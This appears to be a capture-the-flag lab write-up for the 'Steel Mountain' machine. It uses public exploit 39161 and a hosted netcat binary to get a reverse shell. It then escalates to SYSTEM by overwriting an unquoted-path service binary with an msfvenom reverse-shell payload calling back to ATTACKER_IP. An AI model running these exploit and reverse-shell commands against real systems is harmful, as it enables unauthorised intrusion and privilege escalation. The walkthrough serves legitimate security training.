Steel Mountain

Manual Exploitation

PYTHON2 Must Be Used To Host The Static NETCAT Binary

Hosting with Python3 is not going to Work.

• Used Exploit EDB-ID: 39161
• [1] Hosting a Static netcat Binary on [LOCAL-IP:80]
  • The netcat Binary can be Downloaded from here: NETCAT GitHub
• [2] Setting our Machine IP - PORT
• [3] Starting a Listener on the PORT
• [First Execution]: The Exploit Uploads the NETCAT Static Binary to the Remote Machine.
• [Second Execution]: The Exploit Initializes the Connection Back to our Machine.

It Might Be Necessary To Run The Exploit Multiple Times Before Succeeding

STEPS

Payload

• Modify The Exploit Values To Match The Attacker IP

ip_addr = "ATTACKER_IP" #local IP address
local_port = "443" # Local Port number

Python

• Host the Netcat Binary with Python2. The Binary must be Named: nc.exe

attacker@machine:~$ python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.32.61 - - [22/Aug/2022 18:00:01] "GET /nc.exe HTTP/1.1" 200 -
10.10.32.61 - - [22/Aug/2022 18:00:05] "GET /nc.exe HTTP/1.1" 200 -

Exploit

• Execute the Exploit

attacker@machine:~$ python2 39161.py 10.10.32.61 8080

Netcat

• Catch the Reverse SHELL with netcat

attacker@machine:~$ nc -nvlp 443
Connection from 10.10.32.61:49328
Microsoft Windows [Version 6.3.9600]

C:\Windows\Temp> whoami
STEELMOUNTAIN\bill

SMB

• Using a Python SMB Server to Transfer files to the Target Machine.

attacker@machine:~$ smbserver LINUXSHARE /mnt/SMBShare

• Copying winPEASx64 from our SMB Server to the Target Machine.

C:\Windows\Temp> copy \\ATTACKER_IP\LINUXSHARE\winPEASx64.exe winPEASx64.exe

Enumeration

• Enumerating the Machine Using winPEAS
• The AdvancedSystemCareService9 Service has [Unquoted Service Paths] - [CanRestart = True]
• STEELMOUNTAIN\bill Has also Write Permissions.

AdvancedSystemCareService9(Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\AdvancedSystemCare\ASCService.exe] - Auto - Stopped - No Quotes and Space detected
File Permissions: bill [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\IObit\Advanced SystemCare (bill [WriteDataCreateFiles])
Advanced SystemCare Service

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

PAYLOAD

• Generating the PAYLOAD with MSFvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -f exe -o ASCService.exe

• Once again we can Transfer the PAYLOAD to the Target Machine using a Python SMB Server.
• It is going to ask to Overwrite the file: Yes

C:\Program Files (x86)\IObit\Advanced SystemCare> copy \\ATTACKER_IP\LINUXSHARE\ASCService.exe ASCService.exe
Overwrite ASCService.exe? (Yes/No/All): Yes
        1 file(s) copied.

Exploitation

• Restarting the AdvancedSystemCareService9 Service will Start our Reverse Shell.

C:\Program Files (x86)\IObit\Advanced SystemCare> sc stop AdvancedSystemCareService9
C:\Program Files (x86)\IObit\Advanced SystemCare> sc start AdvancedSystemCareService9

• We can catch the Reverse Shell Using netcat
• We have System Rights: NT AUTHORITY\SYSTEM

Connection from 10.10.176.77:49227
Microsoft Windows [Version 6.3.9600]

C:\Windows\system32> whoami
nt authority\system